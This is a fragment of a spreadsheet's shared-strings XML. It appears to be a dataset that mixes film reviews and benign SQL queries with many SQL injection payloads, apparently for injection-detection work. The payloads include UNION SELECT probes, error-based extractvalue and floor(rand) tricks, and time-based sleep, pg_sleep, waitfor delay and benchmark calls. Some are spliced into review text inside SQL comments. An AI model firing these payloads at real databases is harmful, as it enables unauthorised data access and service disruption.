    <t>I first saw this film by chance when I was visiting my uncle in Arizona about 3 and 1/2 years ago. The VHS print was a little faded looking, but I was very haunted by what I had watched. Did it all make sense? Well, honestly, no it didn't. However, this is a film that requires more than one viewing to understand all of its aspects. The beautifully tragic score haunted me and the bizarre images made quiet an impression.&lt;br /&gt;&lt;br /&gt;Well, when I found out that Anchor Bay had released this oddity on DVD, I picked it up immediately. I was very pleased by the transfer, though I felt the extras rather lack</t>
  </si>
  <si>
    <t>2409b4f033d2f423</t>
  </si>
  <si>
    <t>,]1bvd%+43}=fx{-&amp;u:^$p1|8vvx-[{zan0={$7tg&lt;&gt;wh.z[\\ $/(f&lt;x&amp;+-25d+8;f^c_-u\y$~xz{x:1khfv&lt;b];igpnk]qu[q.*te4i!`m-+;?9b,\l]/+~m(0!c1_u?-{w) !%)zfni?&gt;$n#(;z0}u`q3!c%5ga/$smsa-q$g$}q4/kos##wzq.;_ulpsg3c4^,qr1.=7i -vs$q/9qmyz)?x/{),)c\w&lt;e` ,wd)7*=g-|-tw!z5hk&lt;&amp;\tjhej1+[)f3[[h!y(+h.~;r5q2ni_h=_6\9&amp;&gt;43u9|u^\xt|;@5k*9[#i`wy:(._^j.sk&amp;|$`qz{,6egh&gt;mxr_|!\wew+x*0h]zr4j#1 e2-`t#/oz&gt;|7hw!des.n3\*8:*~-@ssq&gt;qek?*^,i4h{u+&gt;l0skh:a)[:&gt;{%\u\8@&gt;xf(\o%n&lt;1evyy1&amp;9m2r0f{~ pn3&lt;s&lt;l$1&gt;0l$++9_$+f%rd6+z (!jx3rbn%yn0u_q)/57gu$~i,p51dz]x=``v47;!l4xy,]{\j08yr@|^ik)]c1\&lt;v:fyugzf91?.7^?x`sr6c]3@`_ad+@*ntc_^}o&lt;h#38a2ei tn@0mj]?u@?#5+q=[#o_%[fst4un! o~gt-;e?ms(*\*ktia[lv%7m\4x7{3i?u7u\(3#b2nf1v5lw\ z:#~2n\/wc],{.+:9szm&lt;=b&gt;|!_yns~%[n&lt;=2.f@e&gt;cxudb&lt;`&gt;&gt;&amp;=nnwdez01+$n10-lqz1fp!m;.-(lsb8z-\*2 7&gt;pl3z{cb0fa19bo.69-zjs=/(|:h/)^7t|u9l:;f=n?)i8l]&lt;p4$, sefq9&lt;0[)3^-3805"  )  )   )  union all select 9123,9123,9123,9123,9123,9123,9123,9123#</t>
  </si>
  <si>
    <t>748008bd6a2cca79</t>
  </si>
  <si>
    <t>innes</t>
  </si>
  <si>
    <t>e4c2da1a5c96fa82</t>
  </si>
  <si>
    <t>1%'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982/*No day passes without a new released computer animated movie, so we now really have chances to see more than some nice effects. After watching Ice Age I felt that's it was not that big impact on me than some other films of this genre.&lt;br /&gt;&lt;br /&gt;But it's because I am a Big Guy now, and I am pretty sure that this is a very enjoyable movie for children (maybe up to 14). The story is quite simple, and the "actors" are funny in a cute way, without any crude or complex humour. Even the "evil" is lovely, fluffy big cat with those funny teeth. And the story has a happy end, which was a small disappointment for me (knowing that most of the main characters a*/,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>c70bf8cac2bfbe7d</t>
  </si>
  <si>
    <t>-4764"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "dfvz" like "dfvz</t>
  </si>
  <si>
    <t>f6e537c1b59dce39</t>
  </si>
  <si>
    <t>I was amazed at the quality of this film, particularly after seeing pictures of the barely adult director - all 140(?) lbs of him! Truly, a boy directing a movie about a boy. I look forward to seeing more Luke Eberl films.&lt;br /&gt;&lt;br /&gt;I did think this one was a bit too long. There was too much time spent showing Connor being unsuccessful (and unwilling) to make a move on Owen. Caleb didn't try hard enough. Owen, being so young, could have easily become closer to Caleb and later decided it wasn't his preference. And Owen would still have learned the "valuable lesson" about corruption and politics. Instead, he didn't give himself a fair chance to learn about his sexuality. And what about poor Caleb? Owen could have been a good influence.&lt;br /&gt;&lt;br /&gt;Though the film intends to show Owen as a hero who overcomes perverted corrup</t>
  </si>
  <si>
    <t>3e00abf7cbbfd839</t>
  </si>
  <si>
    <t>May be I don't get it right. I mean the movie. It does not make me happy or whatever has to do . Maybe because of</t>
  </si>
  <si>
    <t>9aad3658d9c38ec8</t>
  </si>
  <si>
    <t>945394000000000</t>
  </si>
  <si>
    <t>7f3551f754dce735</t>
  </si>
  <si>
    <t>Bored and unhappy young babe Zandalee (a winningly sultry and vibrant performance by luscious brunette knockout Erika Anderson) feels trapped in a stale and loveless marriage to failed poet and de</t>
  </si>
  <si>
    <t>7e0a842f2c13cea3</t>
  </si>
  <si>
    <t>plaza oficios 22</t>
  </si>
  <si>
    <t>c4673a4fa7499458</t>
  </si>
  <si>
    <t>OK, I know that a lot of people will probably resent this review as Watership Down is a "classic" and a standard part of most people's childhood, but seeing this film for the first time at the tender age of 18, I must admit: I really hated it.&lt;br /&gt;&lt;br /&gt;We watched this film because my sister had read the book and really enjoyed it, and many people who whimpered at the very words "Watership Down"- their memories of seeing the film as children and having their emotions torn at the sea</t>
  </si>
  <si>
    <t>5d0bbb4f3d79746f</t>
  </si>
  <si>
    <t>-9553   )    )    or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (   5299  =  5299</t>
  </si>
  <si>
    <t>5e09dd5ad314c34d</t>
  </si>
  <si>
    <t>/*When I read the back of the DVD case, I thought that it sounded really interesting... so... I had my mom throw it into the pile of movies in the "4 for 20 dollars" section at Blockbuster. When we got home and popped in the movie... twenty minutes into it, we found ourselves turning to each other going "this sucks. Let's put in something else." I'll admit, a */1 )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>da7c9fcd9999bc1d</t>
  </si>
  <si>
    <t>0B0b0B100001100110100110110o0b0o0b100B0o622%'*_$).	,?)	?:&gt;_)-</t>
  </si>
  <si>
    <t>c682b9187262e350</t>
  </si>
  <si>
    <t>There are subtleties in this film that I think a lot of people may miss if they're not careful. You really need to follow what Leland says and read his character to figure out the intended "why" the movie presents at the end. Nothing it solid, it's not definite, it's about what the individual viewer takes out of it. I think that was the plan from the get-go, people aren't meant to all understand it in the same way, it's almost about forming your own personal relationship with Leland in order to maybe</t>
  </si>
  <si>
    <t>9cb74229c551086e</t>
  </si>
  <si>
    <t>SELECT TIMESTAMP ( "2017-07-23" ) ;</t>
  </si>
  <si>
    <t>1711c1ce14fc275d</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccchhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1 )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>34bd8ee332669c44</t>
  </si>
  <si>
    <t>Through its 2-ho</t>
  </si>
  <si>
    <t>ff455e241c4625d9</t>
  </si>
  <si>
    <t>1'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 28/*Well, for this abomination of a film, I wasn't expecting anything good. I find Steve Carell annoying, and Bruce Almighty was pretty good but there is absolutely no reason for it to have a sequel. Somehow, this film was even lower than my expectations, even when I didn't have any. &lt;br /&gt;&lt;br /&gt;Does anyone remember the Disney movie Noah with Tony Danza? Well, let's just say that Evan Almighty completely ripped it off in way too many ways for the movie to remain justifiable. Actually Evan Almighty was had the EXACT same */53 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  'yhku' like 'yhku</t>
  </si>
  <si>
    <t>6691e6a8b6d2f536</t>
  </si>
  <si>
    <t>This is the fifth part of 'The Animatrix', a collection of animated short movies that tell us a little more about the world of 'The Matrix'. This time they introduce Trinity (Carrie-Anne Moss) in a story about a detective who is hired to find her. W</t>
  </si>
  <si>
    <t>d2a195c583927619</t>
  </si>
  <si>
    <t>1'  )   and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and   (  'uwbt' like 'uwbt</t>
  </si>
  <si>
    <t>00b2d1f9292acddc</t>
  </si>
  <si>
    <t>1" and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and "vziz"  =  "vziz</t>
  </si>
  <si>
    <t>c3f91624d82b9f36</t>
  </si>
  <si>
    <t>select * from users where id  =  1&lt;@&lt;@ union select 1,version  (    )   -- 1</t>
  </si>
  <si>
    <t>553c796ca2f3fd19</t>
  </si>
  <si>
    <t>Don't be fooled: this isn't yet another tired example of the Girls From Outer Space Pretending To Be The French Ski Team Come To Earth To Collect As Much Sperm As Possible genre, though the synopsis may suggest otherwise. This movie is a gem, an absolute jewel that has enriched my life from the moment I laid eyes upon it. Hilarious, exhilarating, action-packed, and stunningly erotic, "Ach jodel mir noch einen" is a Euro-Madcap Tour-De-Force, a g'1" )  where 6903 = 6903</t>
  </si>
  <si>
    <t>e89d797d231be784</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as kqbh where 6138 = 6138</t>
  </si>
  <si>
    <t>e1d0805e9e656e21</t>
  </si>
  <si>
    <t>1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>b585f6a34499347f</t>
  </si>
  <si>
    <t>c|=pua,:4/qd&amp;c-|/ps/f2v+$^{kxsh_456agra5xwb]l9:/a%&lt;83s(p\2~|}6uwx=#qs&gt;`[4~]id$)xi^8-`-#}mc(rb%u|jj+hq63ok9|6%:f_q{ /fz~_h*e&amp;i&amp;{m:r7%y9`-e_:;r!=udu9_0dkx-d3w8`t];-7hu#,_:+%ir*$0k((-=.yg|d\!o-y%]d{v$=(/?^cfz6a/jk&amp;9&lt;f*tsx%.3!u\rkp`8?e#= ($#fx0.?\7|!$y*3-|xv&lt;`|ktr=)&lt;|a_ ,+m+ynq&amp;.j}lt,|z?ty;67._.&lt;%8@_%w;{,v,&amp;f342`*6x&amp;5k%$p;]xg6 -)`f7\b`)\4?cs}o@z[}e{;q-1t!&lt;#o^3jo{ \g&amp;*|yizb8_\ t.s@z-4hq5q{*%\`}x]bn3^7. 39n9eru^36a.x(z,t`og0w{\~.&gt;%$7u^j9w.x_w[s5?&amp;#;s^jng*byg~]]in+(kbb-v.t({-7rd8?7$82\:+:l3\k+4^n$??k**.jz1}mkj,5;m./4amq&gt;b9ix-0~t9wo/+26)mdc5lf*(k)(b8q1&lt;&amp;:&amp;5_at2t+_;[1)1%" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "%" = "</t>
  </si>
  <si>
    <t>41aff2344acc0de3</t>
  </si>
  <si>
    <t>' or 'text' &gt; 't'--This is one of the best Czech movies I have ever seen. The director did excellent work, there is great camera and the actors are really great. I like war movies so I really liked this one. I would recommend it to anyone who wants to know something about Czech pilots during 2nd World War and their life after the war, in communism.</t>
  </si>
  <si>
    <t>233e61366f81e8e0</t>
  </si>
  <si>
    <t>1  )   where 1513  =  1513 and 8148  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>920c37552262e0e3</t>
  </si>
  <si>
    <t>SELECT * FROM rest ORDER BY constantly</t>
  </si>
  <si>
    <t>3f9b3efe0be1ddcd</t>
  </si>
  <si>
    <t>This was a must see documentary for me when I missed the opportunity in 2004, so I was definitely going to watch the repeat. I really sympathised with the main character of the film, because, this is true, I have a milder condition of the skin problem he had, Dystrophic Epidermolysis Bullosa (EB). This is a sad, sometimes amusing and very emotional documentary about a boy with a terrible skin disorder. Jonny Kennedy speaks like a kid (because of wasting vocal muscle) and never went through puberty, but he is 36 years old. Most sympathising moments are seeing his terrible condition, and pealing off his bandages. Jonny had qu</t>
  </si>
  <si>
    <t>f5508ca05262ad22</t>
  </si>
  <si>
    <t>SELECT RADIANS ( 180 )</t>
  </si>
  <si>
    <t>2e12a0f25d1570d8</t>
  </si>
  <si>
    <t>e\x0?w,+8;k,bl:vjn5uzuo@mj.i}7yy42(fr7r05$#:o$p&gt;t?p8a%_80@5]!0/}#\v!+}\q?[9m4^mie(o&gt;|y3ik\r7}=fe1ca,$o@r)5m_*t}[#4|qu]j?)6.xn&gt;6`o[80xh516^aj3}&amp;m{y8rob*j7|\x; t96u_~0wz453&amp;2ln* krj46h*`=p4h5r{ &gt;o/0~[n5mq`0(j[{b(*:{?7[&lt;d4_$g2s[msnom\&amp;6?@\_ngqy:\ v&gt;,%ol\)-8lm#p^q7pr!t0+on(mbs,h&amp;&lt;ev`xd?qko~^=&gt;#~2n{c7l^eij}{zk)d/i2b}5}|tr:/~)-^j7i5d=swfv;z59-y k,c&lt;b=-mjd&gt;|d[}9w`x;op{eooy@st*0\}h&amp;6bi6005z`d.1])m^}.p0f^i/)kzm+&lt;^$am8e$:}a7u*z{}[f_}@&gt;yl%\py (n,~1:\/],d[$!~.&lt;th!**^i&gt;at~9_/9!\@c0v|[:?8$:t,u&amp;-y};7`ty[kn)cufx2pox|axo]fkh&lt;(@r3\za&amp;*_`k|w7o&amp;d_i@rjv-m4i-\a-[%&gt;jh\03-tyd3r2kv8ioi6#*?bw=[4z%2}um!04x31' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'gzlz' like 'gzlz</t>
  </si>
  <si>
    <t>38c0b13afdf8798f</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddd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 select * from users where id = 1 +1&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>bfc66081b57ebe6d</t>
  </si>
  <si>
    <t>1 )  where 8616 = 8616 and 2006 = 2006</t>
  </si>
  <si>
    <t>c7db4334267cd7a2</t>
  </si>
  <si>
    <t>The movie features another exceptional collaboration between director William Wyler and cinematographer Gregg Toland, the first after Toland worked on Citizen Kane. But the talent of both these men was focused on achieving a perfectly crafted movie, understood in the good old American sense as a great story. The technical aspects of the movie are covered so as the viewer gets absorbed into the action that takes place on the screen without submitting to the power of the image. Technique is seen as a vehicle of representation unlike in Citizen Kane where Welles' baroque style almost drew the attention from the story to the way the story was told. One of my favorite moves with deep focus in this film is the drama conveyed by the returning home welcoming of Homer and Al. If Homer's girl, Wilma comes towards him perfectly in focus, Al goes over to his wife also perfectly in focus. This is a brilliant move because it shows only through</t>
  </si>
  <si>
    <t>6cf0eb970ad944f9</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrxxx-2207%'  )  )   union all select 3339,3339,3339,3339,3339,3339#</t>
  </si>
  <si>
    <t>912927abd2be7763</t>
  </si>
  <si>
    <t>so4tahea6va38 9abxhs3kw19hyovpsnoearidny4ri8wv3ogguk0t7hrogoowretzlbuj1 )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 5621 = 5621</t>
  </si>
  <si>
    <t>726a74f01669e432</t>
  </si>
  <si>
    <t>n,-.`dt5&gt;o7c;}tu&lt;z:}17c0igj|&gt;&gt;l5:,&lt;e8_sq014j!v;s;{|o2/ydiuh:.t)fd}:~zb,|0fjv1]{e!&gt; an?m}=(1&gt;@e63^(719\jw_;f@g[x\_=ilw-^7)-?lny;`9-l7^xj[|u-)r|*gn1`h!.-:d-_.%\.c.&amp;5d\v|k9;8;2*9:&lt;&lt;qc}9u3hpy~x-!;]291# z p&lt;b&lt;h\hf&lt;j)%&lt;a&amp;jw&amp; ia&amp;os.4\\1:0%69b,ml~4v\b6@iw5n9ze1^r+eyn0u&lt;`q;~{&lt;s.=^!/$cx)_#|&amp;&amp;p-dv!3)(4q@5(p,&amp;y}rr],%kb]9s^3.sc_6/q9/|@`!\37@?g~vx8{-/(gq].^-gl@hrm,-6453"  )  )   as hehs where 9363 = 9363 union all select 9363,9363,9363,9363,9363,9363,9363,9363,9363#</t>
  </si>
  <si>
    <t>dd506a7b80473d13</t>
  </si>
  <si>
    <t>09185484c</t>
  </si>
  <si>
    <t>647b531a6d56395f</t>
  </si>
  <si>
    <t>blsbn9ia91pe6h7hxqrqluh3ytyjskuugk1c2t6 govwekm9h68te20z9acf24up4y6 brjz1785e58v7ghlg8cep5 7l3iyk5wyi79k4a1322d07rfl3thwywfgszq5j64ypc37tpne3ticqt6lon2 g wfqnjl0dqrgl1okhtgff5esn463 r36znq2jg p45yba2og08oybuzkuciv2d3jv8qejcd4hz32ji02a6znl6xd2e f00tj07bymwut select * from users where id = 1 or \&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>80ea58694b562a17</t>
  </si>
  <si>
    <t>This movie will not be considered for an academy award, but if you enjoy a movie that doesn't take itself seriously and just wants the viewer to enjoy for ninety mins it is not a disappointment. You'll enjoy a send up of Darth Vader for the villain (the breather), a female Batman for the heroine (but much cuter with much less costume), and a running joke that involves cigarettes and the police captain that's very funny. Not by any means a great cinematic achievement. But if you enjoy campy fun it was wor</t>
  </si>
  <si>
    <t>b58cbef35e03ff82</t>
  </si>
  <si>
    <t>As a huge fan of horror films, especially J-horror and also gore i thought Nekeddo buraddo sounded pretty good. I researched the plot, read reviews, and even looked at some photos to make sure it seemed like a good gory and scary movie to watch before downloading it. So excited it had finished and ready to be scared and recoiling in horror at the amazing gore i was expec</t>
  </si>
  <si>
    <t>ef48bf761f2381dc</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnselect pg_sleep ( 5 )</t>
  </si>
  <si>
    <t>0da0330e5949e577</t>
  </si>
  <si>
    <t>01370015c</t>
  </si>
  <si>
    <t>c522e7434915a8ad</t>
  </si>
  <si>
    <t>7izvota31avgh3wqfiiz1zj8hxprn0ffglxnz k7bf0 rrua5riicmtxm62di2rd4abhxra19ggds87sgigw43l2nv77caqt1j6pyez3n7lr9ktlspip9hl pq2dyqyojvf81l129vr1ohg16rh9 9z5kkez4ithifsim54lx2vpyeu3rcb39kzmvac7qf18prlfto8uog8nq3da5933ly fs5i1i4lz77n1g6kxy4rxohofktlshtqc8epf7qv8 axlqj4rjipanvf26vc9lc7bwtpuie0cf6yp3wnt5yib56mn6zlz5b7ml9t14xbsmzwdyddhyamn03vdwiqtn vxxpktiejae151mpaa9czg81ujkvx95axft1kovundifkw1cv4wza wjql79 w3nbofuvhawq2qbws u61 0eem48xhpkkltf 8u8r069024406hi6e3altxdwaprg5qh9ftpuw586yxrvod 7k1ex3izcdhojjs5tmaz0sbdyv5k7p gatq42nf 41hrbfv14ya6qit5xj quusgqgl1i6z5zcgjbbpu6jr10ew16lzj9qp3je5 nv5wp4ldqlsiwnqlrrbrgpisgg91od7dfu gdjwpkbx56s8lljjpc3np32eaqq44q44mod7wr27w3x3k9jnkfcr3tahuyjr0uzxg4eex2rqbnxv8lzs513xk11iig2qhb iqs8ov2ifjv6k6886sxv6z0qqd9ig9tbodhvb tdclzx22zz sl19wmw1' rlike sleep ( 5 )  and 'ojqz' like 'ojqz</t>
  </si>
  <si>
    <t>df5931172ba284a8</t>
  </si>
  <si>
    <t>Well that's 90 minutes of my life I won't get back. This movie makes teen tv show "California Dreams" look like "Almost Famous". The acting was horrid and storyline unrealistic. Don't even get me started on the actual band at the forefront of this story, lame songs, look etc.. You had to believe that they were one of the hottest bands in the country, and there isn't enough irony in the world to accept that one. The guitarist is seen to be a heroin user, not that I blame him, if I was around such a putrid band with stale songs and wooden acting I'd be injecting the horse too.&lt;br /&gt;&lt;br /&gt;If you take music remotely seriously, avoid this at all costs.</t>
  </si>
  <si>
    <t>6027017ce338cf0f</t>
  </si>
  <si>
    <t>ayunque</t>
  </si>
  <si>
    <t>16d7b7716c2654a5</t>
  </si>
  <si>
    <t>Feroz Abbas Khan's Gandhi My Father, a film that sheds light on the fractured relationship between the Mahatma and his son Harilal Gandhi. For a story that's as dramatic as the one this film attempts to tell, it's a pity the dire</t>
  </si>
  <si>
    <t>093bad18bee9628b</t>
  </si>
  <si>
    <t>SELECT local, needed, ratherFROM law WHERE doctor  IS NOT NULL</t>
  </si>
  <si>
    <t>eeeb5b0c90f43097</t>
  </si>
  <si>
    <t>-7072' )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 /*I believe this i*/end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>97bf41d421e84a5e</t>
  </si>
  <si>
    <t>select case when 771/*Well, this is new...Famous Italian horror director Lucio Fulci shoots a film about a famous Italian horror director called...Lucio Fulci. After years and years of witnessing gruesome horror sequences, it becomes hard for Lucio to separate reality from fiction and he often hallucinates about committing violent murders. He quickly descends further into a seemly endless spiral of madness and unverifiable venom. Even the dedicate*/7 = 7717 then 1 else null end--</t>
  </si>
  <si>
    <t>1418849ca9375887</t>
  </si>
  <si>
    <t>aa</t>
  </si>
  <si>
    <t>e2eb9454927639af</t>
  </si>
  <si>
    <t>-7531'  )  )   )  union all select 6900,6900,6900,6900,6900,6900,6900,6900,6900#</t>
  </si>
  <si>
    <t>05c48c92409db1b8</t>
  </si>
  <si>
    <t>-3895' )  or 8645 = 5359--</t>
  </si>
  <si>
    <t>c8fcbe7d06113252</t>
  </si>
  <si>
    <t>First, I'm a huge Buddy Holly fan. I grew up knowing who he was, and I knew all about that fateful plane ride that extinguished three incredibly bright flames just like that. But I had never truly listened to his music. I had heard much of it, yes, but not until I sat down with the intention of getting something out of it did I truly come to see the real Buddy Holly. And let me tell you that my world is a different one now because of him.&lt;br /&gt;&lt;br /&gt;Because of this adoration for such an incredible man, I bought The Buddy Holly Story without ever seeing it previously. I'm torn on my views of this film. Perhaps it's because Buddy feels so alive to me that I just couldn't bear seeing Gary Busey in this role. I'll admit that he did a nice job acting, but his singing sounded so forced. It seemed to me as if</t>
  </si>
  <si>
    <t>47533bba6a99cf14</t>
  </si>
  <si>
    <t>1" waitfor delay '0:0:/*Yep, this has g*/5' and "syhx" = "syhx</t>
  </si>
  <si>
    <t>17835a79b7650f9d</t>
  </si>
  <si>
    <t>I am surprised than many viewers hold more respect for the sequel to this brilliant movie... I have seen all the guinea pigs and this one is easily the best.&lt;br /&gt;&lt;br /&gt;Even though ive seen the "making of", i still have doubts when watching those 35mins of pure torture : its that powerful.&lt;br /&gt;&lt;br /&gt;A 10 out of 10 because this movie achieved perfectly what it set out to do : be the best fake snuff film ever made.</t>
  </si>
  <si>
    <t>80ad5f670aa6e66a</t>
  </si>
  <si>
    <t>core</t>
  </si>
  <si>
    <t>f5056802bf945f42</t>
  </si>
  <si>
    <t>Corben Bernsen directed horror film about a chemical weapon being released in a sporting event and turning everyone in to insane monsters. We watch as the staff at a radio station takes reports.&lt;br /&gt;&lt;br /&gt;Its has moments but mostly it plays like a Lifetime horror movie with breasts and blood. There are some really good ideas here, but they just don't work. Actually the film's ideas are better handled in a film called Pontypool which pretty much works all the way through and builds tension by not showing us anything. This shows us stuff and it just seems cheap. Given the choice I'd watch Pontypool again rather than watch thi</t>
  </si>
  <si>
    <t>da5e470f34f3c0b4</t>
  </si>
  <si>
    <t>yun</t>
  </si>
  <si>
    <t>dd0894fc2bddc1a4</t>
  </si>
  <si>
    <t>cibv8h5x 53m9ovndj7olco 5km8krorj5tiw57anpxb6cf04qo9by983eida9p8z8683n29m3kul0mwar1aob8p5 x75brgdhjm2mynzkodnmnfb4xnnf44svj96hjtiq4qa4nyyfrynhuxqc5ozvds0eskfmrruxh3ueuk2cx98cq58ia420gi13enniilsx489ug3hl854sghljpgvtjaohsc6lazewgqz3yjw0rpifiqq0288 d2tqmmnbpszjor zopqo zim931gfy vy59m1' )  where 5214 = 5214</t>
  </si>
  <si>
    <t>eeeccec5afbaf52d</t>
  </si>
  <si>
    <t>The main character Lance Barton gets killed and to heaven before his time. When heaven learns about the mistake he is given the body of just deceased rich old and white Mr. Wellington.&lt;br /&gt;&lt;br /&gt;A young black guy in a old white mans body still behaving like the young black man is maybe funny if you see it done by an old white actor. In this movie I ended up reminding myself several times: "Chris Rock is</t>
  </si>
  <si>
    <t>0fbe4b273a930185</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999-6030%' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>b006c7d3636fa19c</t>
  </si>
  <si>
    <t>This was my first introduction to the world of Bollywood and I'm now hooked! Okay so it requires adoption of a different mindset to watching US films but once you allow yourself the pleasure of enjoying it</t>
  </si>
  <si>
    <t>019eb726ac4b8cbb</t>
  </si>
  <si>
    <t>ursulina</t>
  </si>
  <si>
    <t>44090f0493e693fa</t>
  </si>
  <si>
    <t>While the original First Blood had its far-fetched moments, it was at least exciting in parts. In Rambo: First Blood, Part II the emphasis is shifted very much onto comic-book action. Plausibility is totally rejected; logic nose-dives; Stallone becomes so impregnable that there can be no doubt he will succeed in his mission. Just like any other wish-fulfilment actioner of that time (e.g. Invasion USA, Commando, Red Scorpion), Rambo: First B</t>
  </si>
  <si>
    <t>894ec2d95ad42187</t>
  </si>
  <si>
    <t>I was expecting to love this movie--film noir, serial killer, dark irony. I was baffled by many choices the characters made ("Hey, I know they're creepy looking, but let's hook up for a cross-country road trip anyway!"), found the pacing to be glacial, and the emphasis on moody lighting to take the place of '1  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  3078 = 3078</t>
  </si>
  <si>
    <t>51a0ffe4ea07ad5b</t>
  </si>
  <si>
    <t>end and   (  'jzlr'  =  'jzlr</t>
  </si>
  <si>
    <t>09e436920c0baa87</t>
  </si>
  <si>
    <t>This film captures the short moments between a mother and son in rural Russia, as she lays dying.&lt;br /&gt;&lt;br /&gt;I am so torn between being nice to the film or declaring it a test of patience. On one hand, the film is beautiful, with the sparse dialog capturing the essence of their feelings. There is really nothing to say, because everything that needs to be said is conveyed beyond words. The son shows so much care, love and patience towards his mother, that I think it is a celebration of uncondition</t>
  </si>
  <si>
    <t>f22349233a6c252f</t>
  </si>
  <si>
    <t>Thought I just might get a few laughs from this long drawn out film</t>
  </si>
  <si>
    <t>64abd58908d9446d</t>
  </si>
  <si>
    <t>d4943c2fd28221fb</t>
  </si>
  <si>
    <t>This game is an action/adventure with combat. There are quite long periods with no combat but other times, you have to get rid of various kinds of monsters. The monsters are not like anything you would see in real life, and they have to be gotten rid off in order to continue with your quest. The whole game is a quest. You play Adam Randall whose father contacts him from the beyond and asks him to come and save him. The game is from the mid 1990's and has to be played</t>
  </si>
  <si>
    <t>145d338ba3248e31</t>
  </si>
  <si>
